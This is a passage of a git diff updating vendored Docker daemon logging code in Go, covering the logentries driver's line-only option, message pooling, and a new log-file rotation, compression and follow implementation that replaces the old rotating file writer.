info.Config[lineonly]). Debug("logging driver logentries configured") - log, err := le_go.Connect(ctx.Config[token]) + log, err := le_go.Connect(info.Config[token]) if err != nil { - return nil, err + return nil, errors.Wrap(err, "error connecting to logentries") + } + var lineOnly bool + if info.Config[lineonly] != "" { + if lineOnly, err = strconv.ParseBool(info.Config[lineonly]); err != nil { + return nil, errors.Wrap(err, "error parsing lineonly option") + } } return &logentries{ - containerID: ctx.ContainerID, - containerName: ctx.ContainerName, + containerID: info.ContainerID, + containerName: info.ContainerName, writer: log, + lineOnly: lineOnly, }, nil } func (f *logentries) Log(msg *logger.Message) error { - data := map[string]string{ - "container_id": f.containerID, - "container_name": f.containerName, - "source": msg.Source, - "log": string(msg.Line), - } - for k, v := range f.extra { - data[k] = v + if !f.lineOnly { + data := map[string]string{ + "container_id": f.containerID, + "container_name": f.containerName, + "source": msg.Source, + "log": string(msg.Line), + } + for k, v := range f.extra { + data[k] = v + } + ts := msg.Timestamp + logger.PutMessage(msg) + f.writer.Println(f.tag, ts, data) + } else { + line := string(msg.Line) + logger.PutMessage(msg) + f.writer.Println(line) } - f.writer.Println(f.tag, msg.Timestamp, data) return nil } @@ -78,6 +98,7 @@ func ValidateLogOpt(cfg map[string]string) error { for key := range cfg { switch key { case "env": + case "env-regex": case "labels": case "tag": case key: diff --git a/vendor/github.com/docker/docker/daemon/logger/logger.go b/vendor/github.com/docker/docker/daemon/logger/logger.go index d091997358..912e855c7f 100644 --- a/vendor/github.com/docker/docker/daemon/logger/logger.go +++ b/vendor/github.com/docker/docker/daemon/logger/logger.go @@ -5,78 +5,70 @@ // factory, which holds the contextual instance information that // allows multiple loggers of the same type to perform different // actions, such as logging to different locations. -package logger +package logger // import "github.com/docker/docker/daemon/logger" import ( - "errors" - "sort" - "strings" "sync" "time" - "github.com/docker/docker/pkg/jsonlog" + "github.com/docker/docker/api/types/backend" ) -// ErrReadLogsNotSupported is returned when the logger does not support reading logs. -var ErrReadLogsNotSupported = errors.New("configured logging reader does not support reading") +// ErrReadLogsNotSupported is returned when the underlying log driver does not support reading +type ErrReadLogsNotSupported struct{} + +func (ErrReadLogsNotSupported) Error() string { + return "configured logging driver does not support reading" +} + +// NotImplemented makes this error implement the `NotImplemented` interface from api/errdefs +func (ErrReadLogsNotSupported) NotImplemented() {} const ( - // TimeFormat is the time format used for timestamps sent to log readers. - TimeFormat = jsonlog.RFC3339NanoFixed logWatcherBufferSize = 4096 ) -// Message is datastructure that represents piece of output produced by some -// container. The Line member is a slice of an array whose contents can be -// changed after a log driver's Log() method returns. -type Message struct { - Line []byte - Source string - Timestamp time.Time - Attrs LogAttributes - Partial bool -} +var messagePool = &sync.Pool{New: func() interface{} { return &Message{Line: make([]byte, 0, 256)} }} -// CopyMessage creates a copy of the passed-in Message which will remain -// unchanged if the original is changed. Log drivers which buffer Messages -// rather than dispatching them during their Log() method should use this -// function to obtain a Message whose Line member's contents won't change. -func CopyMessage(msg *Message) *Message { - m := new(Message) - m.Line = make([]byte, len(msg.Line)) - copy(m.Line, msg.Line) - m.Source = msg.Source - m.Timestamp = msg.Timestamp - m.Partial = msg.Partial - m.Attrs = make(LogAttributes) - for k, v := range msg.Attrs { - m.Attrs[k] = v - } - return m +// NewMessage returns a new message from the message sync.Pool +func NewMessage() *Message { + return messagePool.Get().(*Message) } -// LogAttributes is used to hold the extra attributes available in the log message -// Primarily used for converting the map type to string and sorting. -type LogAttributes map[string]string -type byKey []string - -func (s byKey) Len() int { return len(s) } -func (s byKey) Less(i, j int) bool { - keyI := strings.Split(s[i], "=") - keyJ := strings.Split(s[j], "=") - return keyI[0] < keyJ[0] +// PutMessage puts the specified message back n the message pool. +// The message fields are reset before putting into the pool. +func PutMessage(msg *Message) { + msg.reset() + messagePool.Put(msg) } -func (s byKey) Swap(i, j int) { - s[i], s[j] = s[j], s[i] + +// Message is data structure that represents piece of output produced by some +// container. The Line member is a slice of an array whose contents can be +// changed after a log driver's Log() method returns. +// +// Message is subtyped from backend.LogMessage because there is a lot of +// internal complexity around the Message type that should not be exposed +// to any package not explicitly importing the logger type. +// +// Any changes made to this struct must also be updated in the `reset` function +type Message backend.LogMessage + +// reset sets the message back to default values +// This is used when putting a message back into the message pool. +// Any changes to the `Message` struct should be reflected here. +func (m *Message) reset() { + m.Line = m.Line[:0] + m.Source = "" + m.Attrs = nil + m.PLogMetaData = nil + + m.Err = nil } -func (a LogAttributes) String() string { - var ss byKey - for k, v := range a { - ss = append(ss, k+"="+v) - } - sort.Sort(ss) - return strings.Join(ss, ",") +// AsLogMessage returns a pointer to the message as a pointer to +// backend.LogMessage, which is an identical type with a different purpose +func (m *Message) AsLogMessage() *backend.LogMessage { + return (*backend.LogMessage)(m) } // Logger is the interface for docker logging drivers. @@ -86,9 +78,17 @@ type Logger interface { Close() error } +// SizedLogger is the interface for logging drivers that can control +// the size of buffer used for their messages. +type SizedLogger interface { + Logger + BufSize() int +} + // ReadConfig is the configuration passed into ReadLogs. type ReadConfig struct { Since time.Time + Until time.Time Tail int Follow bool } @@ -132,3 +132,14 @@ func (w *LogWatcher) Close() { func (w *LogWatcher) WatchClose() <-chan struct{} { return w.closeNotifier } + +// Capability defines the list of capabilities that a driver can implement +// These capabilities are not required to be a logging driver, however do +// determine how a logging driver can be used +type Capability struct { + // Determines if a log driver can read back logs + ReadLogs bool +} + +// MarshalFunc is a func that marshals a message into an arbitrary format +type MarshalFunc func(*Message) ([]byte, error) diff --git a/vendor/github.com/docker/docker/daemon/logger/logger_test.go b/vendor/github.com/docker/docker/daemon/logger/logger_test.go index 16e1514d2d..eaeec24085 100644 --- a/vendor/github.com/docker/docker/daemon/logger/logger_test.go +++ b/vendor/github.com/docker/docker/daemon/logger/logger_test.go @@ -1,26 +1,21 @@ -package logger +package logger // import "github.com/docker/docker/daemon/logger" import ( - "reflect" - "testing" - "time" + "github.com/docker/docker/api/types/backend" ) -func TestCopyMessage(t *testing.T) { +func (m *Message) copy() *Message { msg := &Message{ - Line: []byte("test line."), - Source: "stdout", - Timestamp: time.Now(), - Attrs: LogAttributes{ - "key1": "val1", - "key2": "val2", - "key3": "val3", - }, - Partial: true, + Source: m.Source, + PLogMetaData: m.PLogMetaData, + Timestamp: m.Timestamp, } - m := CopyMessage(msg) - if !reflect.DeepEqual(m, msg) { - t.Fatalf("CopyMessage failed to copy message") + if m.Attrs != nil { + msg.Attrs = make([]backend.LogAttr, len(m.Attrs)) + copy(msg.Attrs, m.Attrs) } + + msg.Line = append(make([]byte, 0, len(m.Line)), m.Line...) + return msg } diff --git a/vendor/github.com/docker/docker/daemon/logger/loggerutils/log_tag.go b/vendor/github.com/docker/docker/daemon/logger/loggerutils/log_tag.go index 4752679c72..719512dbdb 100644 --- a/vendor/github.com/docker/docker/daemon/logger/loggerutils/log_tag.go +++ b/vendor/github.com/docker/docker/daemon/logger/loggerutils/log_tag.go @@ -1,10 +1,10 @@ -package loggerutils +package loggerutils // import "github.com/docker/docker/daemon/logger/loggerutils" import ( "bytes" "github.com/docker/docker/daemon/logger" - "github.com/docker/docker/utils/templates" + "github.com/docker/docker/daemon/logger/templates" ) // DefaultTemplate defines the defaults template logger should use. @@ -12,8 +12,8 @@ const DefaultTemplate = "{{.ID}}" // ParseLogTag generates a context aware tag for consistency across different // log drivers based on the context of the running container. -func ParseLogTag(ctx logger.Context, defaultTemplate string) (string, error) { - tagTemplate := ctx.Config["tag"] +func ParseLogTag(info logger.Info, defaultTemplate string) (string, error) { + tagTemplate := info.Config["tag"] if tagTemplate == "" { tagTemplate = defaultTemplate } @@ -23,7 +23,7 @@ func ParseLogTag(ctx logger.Context, defaultTemplate string) (string, error) { return "", err } buf := new(bytes.Buffer) - if err := tmpl.Execute(buf, &ctx); err != nil { + if err := tmpl.Execute(buf, &info); err != nil { return "", err } diff --git a/vendor/github.com/docker/docker/daemon/logger/loggerutils/log_tag_test.go b/vendor/github.com/docker/docker/daemon/logger/loggerutils/log_tag_test.go index e2aa4358aa..41957a8b19 100644 --- a/vendor/github.com/docker/docker/daemon/logger/loggerutils/log_tag_test.go +++ b/vendor/github.com/docker/docker/daemon/logger/loggerutils/log_tag_test.go @@ -1,4 +1,4 @@ -package loggerutils +package loggerutils // import "github.com/docker/docker/daemon/logger/loggerutils" import ( "testing" @@ -7,27 +7,27 @@ import ( ) func TestParseLogTagDefaultTag(t *testing.T) { - ctx := buildContext(map[string]string{}) - tag, e := ParseLogTag(ctx, "{{.ID}}") - assertTag(t, e, tag, ctx.ID()) + info := buildContext(map[string]string{}) + tag, e := ParseLogTag(info, "{{.ID}}") + assertTag(t, e, tag, info.ID()) } func TestParseLogTag(t *testing.T) { - ctx := buildContext(map[string]string{"tag": "{{.ImageName}}/{{.Name}}/{{.ID}}"}) - tag, e := ParseLogTag(ctx, "{{.ID}}") + info := buildContext(map[string]string{"tag": "{{.ImageName}}/{{.Name}}/{{.ID}}"}) + tag, e := ParseLogTag(info, "{{.ID}}") assertTag(t, e, tag, "test-image/test-container/container-ab") } func TestParseLogTagEmptyTag(t *testing.T) { - ctx := buildContext(map[string]string{}) - tag, e := ParseLogTag(ctx, "{{.DaemonName}}/{{.ID}}") + info := buildContext(map[string]string{}) + tag, e := ParseLogTag(info, "{{.DaemonName}}/{{.ID}}") assertTag(t, e, tag, "test-dockerd/container-ab") } // Helpers -func buildContext(cfg map[string]string) logger.Context { - return logger.Context{ +func buildContext(cfg map[string]string) logger.Info { + return logger.Info{ ContainerID: "container-abcdefghijklmnopqrstuvwxyz01234567890", ContainerName: "/test-container", ContainerImageID: "image-abcdefghijklmnopqrstuvwxyz01234567890", diff --git a/vendor/github.com/docker/docker/daemon/logger/loggerutils/logfile.go b/vendor/github.com/docker/docker/daemon/logger/loggerutils/logfile.go new file mode 100644 index 0000000000..6e3cda8648 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/logger/loggerutils/logfile.go @@ -0,0 +1,666 @@ +package loggerutils // import "github.com/docker/docker/daemon/logger/loggerutils" + +import ( + "bytes" + "compress/gzip" + "context" + "encoding/json" + "fmt" + "io" + "os" + "strconv" + "strings" + "sync" + "time" + + "github.com/docker/docker/daemon/logger" + "github.com/docker/docker/daemon/logger/loggerutils/multireader" + "github.com/docker/docker/pkg/filenotify" + "github.com/docker/docker/pkg/pools" + "github.com/docker/docker/pkg/pubsub" + "github.com/docker/docker/pkg/tailfile" + "github.com/fsnotify/fsnotify" + "github.com/pkg/errors" + "github.com/sirupsen/logrus" +) + +const tmpLogfileSuffix = ".tmp" + +// rotateFileMetadata is a metadata of the gzip header of the compressed log file +type rotateFileMetadata struct { + LastTime time.Time `json:"lastTime,omitempty"` +} + +// refCounter is a counter of logfile being referenced +type refCounter struct { + mu sync.Mutex + counter map[string]int +} + +// Reference increase the reference counter for specified logfile +func (rc *refCounter) GetReference(fileName string, openRefFile func(fileName string, exists bool) (*os.File, error)) (*os.File, error) { + rc.mu.Lock() + defer rc.mu.Unlock() + + var ( + file *os.File + err error + ) + _, ok := rc.counter[fileName] + file, err = openRefFile(fileName, ok) + if err != nil { + return nil, err + } + + if ok { + rc.counter[fileName]++ + } else if file != nil { + rc.counter[file.Name()] = 1 + } + + return file, nil +} + +// Dereference reduce the reference counter for specified logfile +func (rc *refCounter) Dereference(fileName string) error { + rc.mu.Lock() + defer rc.mu.Unlock() + + rc.counter[fileName]-- + if rc.counter[fileName] <= 0 { + delete(rc.counter, fileName) + err := os.Remove(fileName) + if err != nil { + return err + } + } + return nil +} + +// LogFile is Logger implementation for default Docker logging. +type LogFile struct { + mu sync.RWMutex // protects the logfile access + f *os.File // store for closing + closed bool + rotateMu sync.Mutex // blocks the next rotation until the current rotation is completed + capacity int64 // maximum size of each file + currentSize int64 // current size of the latest file + maxFiles int // maximum number of files + compress bool // whether old versions of log files are compressed + lastTimestamp time.Time // timestamp of the last log + filesRefCounter refCounter // keep reference-counted of decompressed files + notifyRotate *pubsub.Publisher + marshal logger.MarshalFunc + createDecoder makeDecoderFunc + perms os.FileMode +} + +type makeDecoderFunc func(rdr io.Reader) func() (*logger.Message, error) + +// NewLogFile creates new LogFile +func NewLogFile(logPath string, capacity int64, maxFiles int, compress bool, marshaller logger.MarshalFunc, decodeFunc makeDecoderFunc, perms os.FileMode) (*LogFile, error) { + log, err := os.OpenFile(logPath, os.O_WRONLY|os.O_APPEND|os.O_CREATE, perms) + if err != nil { + return nil, err + } + + size, err := log.Seek(0, os.SEEK_END) + if err != nil { + return nil, err + } + + return &LogFile{ + f: log, + capacity: capacity, + currentSize: size, + maxFiles: maxFiles, + compress: compress, + filesRefCounter: refCounter{counter: make(map[string]int)}, + notifyRotate: pubsub.NewPublisher(0, 1), + marshal: marshaller, + createDecoder: decodeFunc, + perms: perms, + }, nil +} + +// WriteLogEntry writes the provided log message to the current log file. +// This may trigger a rotation event if the max file/capacity limits are hit. +func (w *LogFile) WriteLogEntry(msg *logger.Message) error { + b, err := w.marshal(msg) + if err != nil { + return errors.Wrap(err, "error marshalling log message") + } + + logger.PutMessage(msg) + + w.mu.Lock() + if w.closed { + w.mu.Unlock() + return errors.New("cannot write because the output file was closed") + } + + if err := w.checkCapacityAndRotate(); err != nil { + w.mu.Unlock() + return err + } + + n, err := w.f.Write(b) + if err == nil { + w.currentSize += int64(n) + w.lastTimestamp = msg.Timestamp + } + w.mu.Unlock() + return err +} + +func (w *LogFile) checkCapacityAndRotate() error { + if w.capacity == -1 { + return nil + } + + if w.currentSize >= w.capacity { + w.rotateMu.Lock() + fname := w.f.Name() + if err := w.f.Close(); err != nil { + w.rotateMu.Unlock() + return errors.Wrap(err, "error closing file") + } + if err := rotate(fname, w.maxFiles, w.compress); err != nil { + w.rotateMu.Unlock() + return err + } + file, err := os.OpenFile(fname, os.O_WRONLY|os.O_TRUNC|os.O_CREATE, w.perms) + if err != nil { + w.rotateMu.Unlock() + return err + } + w.f = file + w.currentSize = 0 + w.notifyRotate.Publish(struct{}{}) + + if w.maxFiles <= 1 || !w.compress { + w.rotateMu.Unlock() + return nil + } + + go func() { + compressFile(fname+".1", w.lastTimestamp) + w.rotateMu.Unlock() + }() + } + + return nil +} + +func rotate(name string, maxFiles int, compress bool) error { + if maxFiles < 2 { + return nil + } + + var extension string + if compress { + extension = ".gz" + } + + lastFile := fmt.Sprintf("%s.%d%s", name, maxFiles-1, extension) + err := os.Remove(lastFile) + if err != nil && !os.IsNotExist(err) { + return errors.Wrap(err, "error removing oldest log file") + } + + for i := maxFiles - 1; i > 1; i-- { + toPath := name + "." + strconv.Itoa(i) + extension + fromPath := name + "." + strconv.Itoa(i-1) + extension + if err := os.Rename(fromPath, toPath); err != nil && !os.IsNotExist(err) { + return err + } + } + + if err := os.Rename(name, name+".1"); err != nil && !os.IsNotExist(err) { + return err + } + + return nil +} + +func compressFile(fileName string, lastTimestamp time.Time) { + file, err := os.Open(fileName) + if err != nil { + logrus.Errorf("Failed to open log file: %v", err) + return + } + defer func() { + file.Close() + err := os.Remove(fileName) + if err != nil { + logrus.Errorf("Failed to remove source log file: %v", err) + } + }() + + outFile, err := os.OpenFile(fileName+".gz", os.O_CREATE|os.O_TRUNC|os.O_RDWR, 0640) + if err != nil { + logrus.Errorf("Failed to open or create gzip log file: %v", err) + return + } + defer func() { + outFile.Close() + if err != nil { + os.Remove(fileName + ".gz") + } + }() + + compressWriter := gzip.NewWriter(outFile) + defer compressWriter.Close() + + // Add the last log entry timestramp to the gzip header + extra := rotateFileMetadata{} + extra.LastTime = lastTimestamp + compressWriter.Header.Extra, err = json.Marshal(&extra) + if err != nil { + // Here log the error only and don't return since this is just an optimization. + logrus.Warningf("Failed to marshal gzip header as JSON: %v", err) + } + + _, err = pools.Copy(compressWriter, file) + if err != nil { + logrus.WithError(err).WithField("module", "container.logs").WithField("file", fileName).Error("Error compressing log file") + return + } +} + +// MaxFiles return maximum number of files +func (w *LogFile) MaxFiles() int { + return w.maxFiles +} + +// Close closes underlying file and signals all readers to stop. +func (w *LogFile) Close() error { + w.mu.Lock() + defer w.mu.Unlock() + if w.closed { + return nil + } + if err := w.f.Close(); err != nil { + return err + } + w.closed = true + return nil +} + +// ReadLogs decodes entries from log files and sends them the passed in watcher +// +// Note: Using the follow option can become inconsistent in cases with very frequent rotations and max log files is 1. +// TODO: Consider a different implementation which can effectively follow logs under frequent rotations. +func (w *LogFile) ReadLogs(config logger.ReadConfig, watcher *logger.LogWatcher) { + w.mu.RLock() + currentFile, err := os.Open(w.f.Name()) + if err != nil { + w.mu.RUnlock() + watcher.Err <- err + return + } + defer currentFile.Close() + + currentChunk, err := newSectionReader(currentFile) + if err != nil { + w.mu.RUnlock() + watcher.Err <- err + return + } + + if config.Tail != 0 { + files, err := w.openRotatedFiles(config) + if err != nil { + w.mu.RUnlock() + watcher.Err <- err + return + } + w.mu.RUnlock() + seekers := make([]io.ReadSeeker, 0, len(files)+1) + for _, f := range files { + seekers = append(seekers, f) + } + if currentChunk.Size() > 0 { + seekers = append(seekers, currentChunk) + } + if len(seekers) > 0 { + tailFile(multireader.MultiReadSeeker(seekers...), watcher, w.createDecoder, config) + } + for _, f := range files { + f.Close() + fileName := f.Name() + if strings.HasSuffix(fileName, tmpLogfileSuffix) { + err := w.filesRefCounter.Dereference(fileName) + if err != nil { + logrus.Errorf("Failed to dereference the log file %q: %v", fileName, err) + } + } + } + + w.mu.RLock() + } + + if !config.Follow || w.closed { + w.mu.RUnlock() + return + } + w.mu.RUnlock() + + notifyRotate := w.notifyRotate.Subscribe() + defer w.notifyRotate.Evict(notifyRotate) + followLogs(currentFile, watcher, notifyRotate, w.createDecoder, config.Since, config.Until) +} + +func (w *LogFile) openRotatedFiles(config logger.ReadConfig) (files []*os.File, err error) { + w.rotateMu.Lock() + defer w.rotateMu.Unlock() + + defer func() { + if err == nil { + return + } + for _, f := range files { + f.Close() + if strings.HasSuffix(f.Name(), tmpLogfileSuffix) { + err := os.Remove(f.Name()) + if err != nil && !os.IsNotExist(err) { + logrus.Warningf("Failed to remove the logfile %q: %v", f.Name, err) + } + } + } + }() + + for i := w.maxFiles; i > 1; i-- { + f, err := os.Open(fmt.Sprintf("%s.%d", w.f.Name(), i-1)) + if err != nil { + if !os.IsNotExist(err) { + return nil, errors.Wrap(err, "error opening rotated log file") + } + + fileName := fmt.Sprintf("%s.%d.gz", w.f.Name(), i-1) + decompressedFileName := fileName + tmpLogfileSuffix + tmpFile, err := w.filesRefCounter.GetReference(decompressedFileName, func(refFileName string, exists bool) (*os.File, error) { + if exists { + return os.Open(refFileName) + } + return decompressfile(fileName, refFileName, config.Since) + }) + + if err != nil { + if !os.IsNotExist(errors.Cause(err)) { + return nil, errors.Wrap(err, "error getting reference to decompressed log file") + } + continue + } + if tmpFile == nil { + // The log before `config.Since` does not need to read + break + } + + files = append(files, tmpFile) + continue + } + files = append(files, f) + } + + return files, nil +} + +func decompressfile(fileName, destFileName string, since time.Time) (*os.File, error) { + cf, err := os.Open(fileName) + if err != nil { + return nil, errors.Wrap(err, "error opening file for decompression") + } + defer cf.Close() + + rc, err := gzip.NewReader(cf) + if err != nil { + return nil, errors.Wrap(err, "error making gzip reader for compressed log file") + } + defer rc.Close() + + // Extract the last log entry timestramp from the gzip header + extra := &rotateFileMetadata{} + err = json.Unmarshal(rc.Header.Extra, extra) + if err == nil && extra.LastTime.Before(since) { + return nil, nil + } + + rs, err := os.OpenFile(destFileName, os.O_CREATE|os.O_RDWR, 0640) + if err != nil { + return nil, errors.Wrap(err, "error creating file for copying decompressed log stream") + } + + _, err = pools.Copy(rs, rc) + if err != nil { + rs.Close() + rErr := os.Remove(rs.Name()) + if rErr != nil && !os.IsNotExist(rErr) { + logrus.Errorf("Failed to remove the logfile %q: %v", rs.Name(), rErr) + } + return nil, errors.Wrap(err, "error while copying decompressed log stream to file") + } + + return rs, nil +} + +func newSectionReader(f *os.File) (*io.SectionReader, error) { + // seek to the end to get the size + // we'll leave this at the end of the file since section reader does not advance the reader + size, err := f.Seek(0, os.SEEK_END) + if err != nil { + return nil, errors.Wrap(err, "error getting current file size") + } + return io.NewSectionReader(f, 0, size), nil +} + +type decodeFunc func() (*logger.Message, error) + +func tailFile(f io.ReadSeeker, watcher *logger.LogWatcher, createDecoder makeDecoderFunc, config logger.ReadConfig) { + var rdr io.Reader = f + if config.Tail > 0 { + ls, err := tailfile.TailFile(f, config.Tail) + if err != nil { + watcher.Err <- err + return + } + rdr = bytes.NewBuffer(bytes.Join(ls, []byte("\n"))) + } + + decodeLogLine := createDecoder(rdr) + for { + msg, err := decodeLogLine() + if err != nil { + if errors.Cause(err) != io.EOF { + watcher.Err <- err + } + return + } + if !config.Since.IsZero() && msg.Timestamp.Before(config.Since) { + continue + } + if !config.Until.IsZero() && msg.Timestamp.After(config.Until) { + return + } + select { + case <-watcher.WatchClose(): + return + case watcher.Msg <- msg: + } + } +} + +func followLogs(f *os.File, logWatcher *logger.LogWatcher, notifyRotate chan interface{}, createDecoder makeDecoderFunc, since, until time.Time) { + decodeLogLine := createDecoder(f) + + name := f.Name() + fileWatcher, err := watchFile(name) + if err != nil { + logWatcher.Err <- err + return + } + defer func() { + f.Close() + fileWatcher.Remove(name) + fileWatcher.Close() + }() + + ctx, cancel := context.WithCancel(context.Background()) + defer cancel() + go func() { + select { + case <-logWatcher.WatchClose(): + fileWatcher.Remove(name) + cancel() + case <-ctx.Done(): + return + } + }() + + var retries int + handleRotate := func() error { + f.Close() + fileWatcher.Remove(name) + + // retry when the file doesn't exist + for retries := 0; retries <= 5; retries++ { + f, err = os.Open(name) + if err == nil || !os.IsNotExist(err) { + break + } + } + if err != nil { + return err + } + if err := fileWatcher.Add(name); err != nil { + return err + } + decodeLogLine = createDecoder(f) + return nil + } + + errRetry := errors.New("retry") + errDone := errors.New("done") + waitRead := func() error { + select { + case e := <-fileWatcher.Events(): + switch e.Op { + case fsnotify.Write: + decodeLogLine = createDecoder(f) + return nil + case fsnotify.Rename, fsnotify.Remove: + select { + case <-notifyRotate: + case <-ctx.Done(): + return errDone + } + if err := handleRotate(); err != nil { + return err + } + return nil + } + return errRetry + case err := <-fileWatcher.Errors(): + logrus.Debug("logger got error watching file: %v", err) + // Something happened, let's try and stay alive and create a new watcher + if retries <= 5 { + fileWatcher.Close() + fileWatcher, err = watchFile(name) + if err != nil { + return err + } + retries++ + return errRetry + } + return err + case <-ctx.Done(): + return errDone + } + } + + handleDecodeErr := func(err error) error { + if errors.Cause(err) != io.EOF { + return err + } + + for { + err := waitRead() + if err == nil { + break + } + if err == errRetry { + continue + } + return err + } + return nil + } + + // main loop + for { + msg, err := decodeLogLine() + if err != nil { + if err := handleDecodeErr(err); err != nil { + if err == errDone { + return + } + // we got an unrecoverable error, so return + logWatcher.Err <- err + return + } + // ready to try again + continue + } + + retries = 0 // reset retries since we've succeeded + if !since.IsZero() && msg.Timestamp.Before(since) { + continue + } + if !until.IsZero() && msg.Timestamp.After(until) { + return + } + select { + case logWatcher.Msg <- msg: + case <-ctx.Done(): + logWatcher.Msg <- msg + for { + msg, err := decodeLogLine() + if err != nil { + return + } + if !since.IsZero() && msg.Timestamp.Before(since) { + continue + } + if !until.IsZero() && msg.Timestamp.After(until) { + return + } + logWatcher.Msg <- msg + } + } + } +} + +func watchFile(name string) (filenotify.FileWatcher, error) { + fileWatcher, err := filenotify.New() + if err != nil { + return nil, err + } + + logger := logrus.WithFields(logrus.Fields{ + "module": "logger", + "fille": name, + }) + + if err := fileWatcher.Add(name); err != nil { + logger.WithError(err).Warnf("falling back to file poller") + fileWatcher.Close() + fileWatcher = filenotify.NewPollingWatcher() + + if err := fileWatcher.Add(name); err != nil { + fileWatcher.Close() + logger.WithError(err).Debugf("error watching log file for modifications") + return nil, err + } + } + return fileWatcher, nil +} diff --git a/vendor/github.com/docker/docker/pkg/ioutils/multireader.go b/vendor/github.com/docker/docker/daemon/logger/loggerutils/multireader/multireader.go similarity index 92% rename from vendor/github.com/docker/docker/pkg/ioutils/multireader.go rename to vendor/github.com/docker/docker/daemon/logger/loggerutils/multireader/multireader.go index d7b97486c6..77980a2a0a 100644 --- a/vendor/github.com/docker/docker/pkg/ioutils/multireader.go +++ b/vendor/github.com/docker/docker/daemon/logger/loggerutils/multireader/multireader.go @@ -1,4 +1,4 @@ -package ioutils +package multireader // import "github.com/docker/docker/daemon/logger/loggerutils/multireader" import ( "bytes" @@ -46,7 +46,9 @@ func (r *multiReadSeeker) Seek(offset int64, whence int) (int64, error) { rdrOffset := offset - tmpOffset idx := i - rdr.Seek(rdrOffset, os.SEEK_SET) + if _, err := rdr.Seek(rdrOffset, os.SEEK_SET); err != nil { + return -1, err + } // make sure all following readers are at 0 for _, rdr := range r.readers[i+1:] { rdr.Seek(0, os.SEEK_SET) @@ -67,7 +69,9 @@ func (r *multiReadSeeker) Seek(offset int64, whence int) (int64, error) { } tmpOffset += s } - r.Seek(tmpOffset+offset, os.SEEK_SET) + if _, err := r.Seek(tmpOffset+offset, os.SEEK_SET); err != nil { + return -1, err + } return tmpOffset + offset, nil case os.SEEK_CUR: if r.pos == nil { @@ -134,25 +138,10 @@ func (r *multiReadSeeker) getCurOffset() (int64, error) { return totalSize, nil } -func (r *multiReadSeeker) getOffsetToReader(rdr io.ReadSeeker) (int64, error) { - var offset int64 - for _, r := range r.readers { - if r == rdr { - break - } - - size, err := getReadSeekerSize(rdr) - if err != nil { - return -1, err - } - offset += size - } - return offset, nil -} - func (r *multiReadSeeker) Read(b []byte) (int, error) { if r.pos == nil { - r.pos = &pos{0, 0} + // make sure all readers are at 0 + r.Seek(0, os.SEEK_SET) } bLen := int64(len(b)) diff --git a/vendor/github.com/docker/docker/pkg/ioutils/multireader_test.go b/vendor/github.com/docker/docker/daemon/logger/loggerutils/multireader/multireader_test.go similarity index 91% rename from vendor/github.com/docker/docker/pkg/ioutils/multireader_test.go rename to vendor/github.com/docker/docker/daemon/logger/loggerutils/multireader/multireader_test.go index 65309a9565..2fb66ab566 100644 --- a/vendor/github.com/docker/docker/pkg/ioutils/multireader_test.go +++ b/vendor/github.com/docker/docker/daemon/logger/loggerutils/multireader/multireader_test.go @@ -1,4 +1,4 @@ -package ioutils +package multireader // import "github.com/docker/docker/daemon/logger/loggerutils/multireader" import ( "bytes" @@ -55,6 +55,20 @@ func TestMultiReadSeekerReadAll(t *testing.T) { if string(b) != expected { t.Fatalf("ReadAll failed, got: %q, expected %q", string(b), expected) } + + // The positions of some readers are not 0 + s1.Seek(0, os.SEEK_SET) + s2.Seek(0, os.SEEK_END) + s3.Seek(0, os.SEEK_SET) + mr = MultiReadSeeker(s1, s2, s3) + b, err = ioutil.ReadAll(mr) + if err != nil { + t.Fatal(err) + } + + if string(b) != expected { + t.Fatalf("ReadAll failed, got: %q, expected %q", string(b), expected) + } } func TestMultiReadSeekerReadEach(t *testing.T) { @@ -191,9 +205,9 @@ func TestMultiReadSeekerCurAfterSet(t *testing.T) { } func TestMultiReadSeekerSmallReads(t *testing.T) { - readers := []io.ReadSeeker{} + var readers []io.ReadSeeker for i := 0; i < 10; i++ { - integer := make([]byte, 4, 4) + integer := make([]byte, 4) binary.BigEndian.PutUint32(integer, uint32(i)) readers = append(readers, bytes.NewReader(integer)) } diff --git a/vendor/github.com/docker/docker/daemon/logger/loggerutils/rotatefilewriter.go b/vendor/github.com/docker/docker/daemon/logger/loggerutils/rotatefilewriter.go deleted file mode 100644 index 99e0964aea..0000000000 --- a/vendor/github.com/docker/docker/daemon/logger/loggerutils/rotatefilewriter.go +++ /dev/null @@ -1,124 +0,0 @@ -package loggerutils - -import ( - "os" - "strconv" - "sync" - - "github.com/docker/docker/pkg/pubsub" -) - -// RotateFileWriter is Logger implementation for default Docker logging. -type RotateFileWriter struct { - f *os.File // store for closing - mu sync.Mutex - capacity int64 //maximum size of each file - currentSize int64 // current size of the latest file - maxFiles int //maximum number of files - notifyRotate *pubsub.Publisher -} - -//NewRotateFileWriter creates new RotateFileWriter -func NewRotateFileWriter(logPath string, capacity int64, maxFiles int) (*RotateFileWriter, error) { - log, err := os.OpenFile(logPath, os.O_WRONLY|os.O_APPEND|os.O_CREATE, 0640) - if err != nil { - return nil, err - } - - size, err := log.Seek(0, os.SEEK_END) - if err != nil { - return nil, err - } - - return &RotateFileWriter{ - f: log, - capacity: capacity, - currentSize: size, - maxFiles: maxFiles, - notifyRotate: pubsub.NewPublisher(0, 1), - }, nil -} - -//WriteLog write log message to File -func (w *RotateFileWriter) Write(message []byte) (int, error) { - w.mu.Lock() - if err := w.checkCapacityAndRotate(); err != nil { - w.mu.Unlock() - return -1, err - } - - n, err := w.f.Write(message) - if err == nil { - w.currentSize += int64(n) - } - w.mu.Unlock() - return n, err -} - -func (w *RotateFileWriter) checkCapacityAndRotate() error { - if w.capacity == -1 { - return nil - } - - if w.currentSize >= w.capacity { - name := w.f.Name() - if err := w.f.Close(); err != nil { - return err - } - if err := rotate(name, w.maxFiles); err != nil { - return err - } - file, err := os.OpenFile(name, os.O_WRONLY|os.O_TRUNC|os.O_CREATE, 06400) - if err != nil { - return err - } - w.f = file - w.currentSize = 0 - w.notifyRotate.Publish(struct{}{}) - } - - return nil -} - -func rotate(name string, maxFiles int) error { - if maxFiles < 2 { - return nil - } - for i := maxFiles - 1; i > 1; i-- { - toPath := name + "." + strconv.Itoa(i) - fromPath := name + "." + strconv.Itoa(i-1) - if err := os.Rename(fromPath, toPath); err != nil && !os.IsNotExist(err) { - return err - } - } - - if err := os.Rename(name, name+".1"); err != nil && !os.IsNotExist(err) { - return err - } - return nil -} - -// LogPath returns the location the given writer logs to. -func (w *RotateFileWriter) LogPath() string { - return w.f.Name() -} - -// MaxFiles return maximum number of files -func (w *RotateFileWriter) MaxFiles() int { - return w.maxFiles -} - -//NotifyRotate returns the new 